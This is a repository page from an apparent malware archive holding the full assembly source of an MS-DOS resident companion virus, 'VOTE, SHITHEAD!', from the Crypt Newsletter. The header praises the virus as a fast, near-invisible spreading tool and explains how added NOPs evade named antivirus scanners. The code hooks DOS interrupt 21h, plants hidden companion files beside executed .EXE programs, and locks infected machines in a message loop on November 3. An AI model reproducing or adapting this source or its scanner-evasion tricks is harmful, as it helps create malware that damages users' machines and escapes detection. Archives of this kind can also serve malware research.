MalwareSourceCode/MSDOS/L-Index/Virus.MSDOS.Unknown.lb-349.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

319 lines
11 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;****************************************************************************
;* VOTE, SHITHEAD! virus Edited by URNST KOUCH for the Crypt Newsletter 7.
;*
;* TASM/MASM compatible source listing
;*
;* VOTE, SHITHEAD is a resident, companion virus based upon Little
;* Brother code and library .asm routines extracted from Nowhere Man's VCL.
;* It is also 'patched' with three 'nops' (they are commented) which
;* effectively blind a number of a-v scanners. This simple alteration
;* demonstrates a practical benefit of source code possession: quick
;* generation of different virus strains becomes a task within anyone's
;* reach. The only tools needed are a number of virus scanners and patience.
;*
;* In any case, the VOTE virus is just the ideal sample needed for
;* judicious virus action. It is a PERFECT tool for viral spreading for
;* a number of reasons. First, it is a FAST infector. Once resident
;* VOTE will create a companion file for ANY .EXE executed on ANY drive
;* and it will do it so quickly that most users, even suspicious ones,
;* will not notice any slowdown or glitches in machine operation.
;* Second, 'companion-ed' .EXE's will continue to load and function
;* properly when VOTE is resident. At the start of the day's computing,
;* the first 'companion-ed' .EXE executed will misfire ONCE as the virus
;* becomes resident. If it is re-called it will function perfectly.
;* Third, VOTE like the INSUFF viruses in the last newsletter strikes
;* directly at anti-virus suites vulnerable to 'spawning' infections (many
;* no-names, CPAV, NAV) and creates 'hidden' companion files, an improvement
;* over the original virus's modus operandi which left them out in plane
;* sight in the directory. Last, VOTE is very small. In RAM, it is not
;* discernible, taking up slightly less that 0.25k. Characteristically,
;* this is NOT reported by a mem /c display. In fact,
;* VOTE is almost invisible to any number of standard diagnostic
;* tests. Memory maps by QEMM and Norton's SYSINFO will
;* report INT 21 hooked differently. But unless the user can compare
;* an uncontaminated INTERRUPT report with one when the virus IS present,
;* it's unlikely he'll know anything is different. Even then, VOTE is hard
;* to notice.
;*
;* On election day, November 3rd, VOTE will lock an infected machine into
;* a loop as it displays a "DID YOU VOTE, SHITHEAD??" query repetitively
;* across the monitor. Computing will be impossible on Nov. 3rd
;* unless VOTE is removed from the machine, a task accomplished by unmasking
;* all the hidden .COMfiles and deleting them while
;* the virus is NOT resident. At all other times, VOTE is almost completely
;* transparent.
;****************************************************************************
code segment
assume cs:code,ds:code,es:nothing
.RADIX 16
oi21 equ endit
nameptr equ endit+4
DTA equ endit+8
;****************************************************************************
;* Check for activation date, then proceed to installation!
;****************************************************************************
org 100h
begin:
call get_day ; Get the day, DOS time/date grab
cmp ax,0003h ; Did the function return the 3rd?
jne realstrt ; If equal, continue along stream
call get_month ; Get the month, DOS time/date grab
cmp ax,000Bh ; Did the function return November (11)?
jne realstrt ; If equal, continue to blooie; if not
; skip to loading of virus
blooie: mov dx, offset shithead ;load 'shithead' message
mov ah,9 ;display it and loop
int 21h ;endlessly until
jmp blooie ;user becomes ill and reboots
realstrt: mov ax,0044h ;move VOTE SHITHEAD to empty hole in RAM
nop ;a 'nop' to confuse tbSCAN
mov es,ax
nop ;a 'nop' to confuse Datatechnik's AVscan
mov di,0100h
mov si,di
mov cx,endit - begin ;length of SHITHEAD into cx
rep movsb
mov ds,cx ;get original int21 vector
mov si,0084h
mov di,offset oi21
mov dx,offset ni21
lodsw
cmp ax,dx ;check to see if virus is around
je cancel ; by comparing new interrupt (ni21)
stosw ; vector to current, if it looks
movsw ; the same 'cancel' operation
push es ;set vector to new handler
pop ds
mov ax,2521h
int 21h
cancel: ret
;****************************************************************************
;* File-extension masks for checking and naming routines;message text
;****************************************************************************
EXE_txt db 'EXE',0
COM_txt db 'COM',0
SHITHEAD db "DID YOU VOTE, SHITHEAD??"
db 07h,07h,'$'
;****************************************************************************
;* Interrupt handler 24
;****************************************************************************
ni24: mov al,03 ;virus critical error handler
iret ;prevents embarrassing messages
;on attempted writes to protected disks
;****************************************************************************
;* Interrupt handler 21
;****************************************************************************
ni21: pushf
push es
push ds
push ax
push bx
push dx
cmp ax,4B00h ;now that we're installed
jne exit ; check for 4B00, DOS excutions
doit: call infect ; if one comes by, grab it
exit: pop dx ; if anything else, goto sleep
pop bx
pop ax
pop ds
pop es
popf
jmp dword ptr cs:[oi21] ;call to old int-handler
;****************************************************************************
;* Try to infect a file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
mov word ptr cs:[nameptr],dx ;save the ptr to the filename
mov word ptr cs:[nameptr+2],ds
mov ah,2Fh ;get old DTA
int 21
push es
push bx
push cs ;set new DTA
pop ds
mov dx,offset DTA
mov ah,1Ah
int 21
call searchpoint ; here's where we grab a name
push di ; for ourselves
mov si,offset COM_txt ;is extension 'COM'?
mov cx,3
rep cmpsb
pop di
jz do_com ;if so, go to our .COM routine
mov si,offset EXE_txt ;is extension 'EXE'?
nop ;'nop' to confuse SCAN v95b.
mov cl,3
rep cmpsb
jnz return
do_exe: mov si,offset COM_txt ;change extension to COM
nop ;another 'nop' to confuse SCAN
call change_ext
mov ax,3300h ;get ctrl-break flag
nop
int 21
push dx
cwd ;clear the flag
inc ax
push ax
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
push cs ;set int24 vector to new handler
pop ds ;virus handles machine
mov dx,offset ni24 ;exits on attempted writes
mov ah,25h ;to write-protected disks
push ax
int 21
lds dx,dword ptr [nameptr] ;create the virus (with name of .EXE target)
mov ah,03Ch ; DOS create file function
mov cx,00100111b ; CX holds file attributes (all)
int 021h ; makes it hidden/system/read-only
; do it
xchg bx,ax ;save handle
push cs
pop ds
mov cx,endit - begin ; write the virus to the created file
mov dx,offset begin ; CX contains length
mov ah,40h ; write to file function
int 21
mov ah,3Eh ;close the file
int 21
return1: pop ax ;restore int24 vector
pop ds
pop dx
int 21
pop ax ;restore ctrl-break flag
pop dx
int 21
mov si,offset EXE_txt ;change extension to EXE
call change_ext ;execute EXE-file
return: mov ah,1Ah ;restore old DTA
pop dx
pop ds
int 21
ret
do_com: call findfirst ;is the COM-file a virus?
cmp word ptr cs:[DTA+1Ah],endit - begin ;compare it to virus length
jne return ;no, so execute COM-file
mov si,offset EXE_txt ;does the EXE-variant exist?
call change_ext
call findfirst
jnc return ;yes, execute EXE-file
mov si,offset COM_txt ;change extension to COM
call change_ext
jmp short return ;execute COM-file
;****************************************************************************
;* Search beginning of extension for name we will usurp
;****************************************************************************
searchpoint: les di,dword ptr cs:[nameptr]
mov ch,0FFh
mov al,0
repnz scasb
sub di,4
ret
;****************************************************************************
;* Change the extension of the filename (CS:SI -> ext)
;****************************************************************************
change_ext: call searchpoint
push cs
pop ds
movsw
movsw
ret
;****************************************************************************
;* Find the file
;****************************************************************************
findfirst: lds dx,dword ptr [nameptr]
mov cl,27h
mov ah,4Eh
int 21
ret
;****************************************************************************
;* Get the day off the system for activation checking
;****************************************************************************
get_day:
mov ah,02Ah ; DOS get date function
int 021h
mov al,dl ; Copy day into AL
cbw ; Sign-extend AL into AX
ret ; Get back to caller
;*************************************************************************
;* Get the month off the system for activation checking
;*************************************************************************
get_month:
mov ah,02Ah ; DOS get date function
int 021h
mov al,dh ; Copy month into AL
cbw ; Sign-extend AL into AX
ret ; Get back to caller
endit:
code ends
end begin